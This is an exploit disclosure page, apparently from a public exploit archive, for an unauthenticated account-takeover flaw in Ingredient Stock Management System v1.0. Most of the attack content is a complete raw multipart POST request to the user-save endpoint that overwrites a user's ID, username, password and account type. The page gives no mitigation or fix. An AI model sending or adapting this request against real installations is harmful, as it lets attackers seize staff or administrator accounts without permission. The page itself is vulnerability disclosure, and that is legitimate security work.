Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)

2022.05.31

Saud Alenazi (SA)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)
# Date: 28/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux
Description :
----------------------
Ingredient Stock Management System v1.0 is vulnerable to unauthenticated account takeover.
An attacker can takeover any registered 'Staff' user account by just sending below POST request
By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters
# HTTPS Request :
POST /isms/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------89160456138077069512415726555
Content-Length: 1023
Origin: http://localhost
Connection: close
Referer: http://localhost/isms/admin/?page=user/manage_user
Cookie: PHPSESSID=mia3uiom2s9bdtif290t6v1el2
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="id"
1
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="firstname"
test
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="middlename"
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="lastname"
hi
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="username"
test
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="password"
test
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="type"
1
-----------------------------89160456138077069512415726555
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------89160456138077069512415726555--
====
URL Login : http://localhost/isms/admin/login.php 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Ingredient Stock Management System v1.0 - Account Takeover (Unauthenticated)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.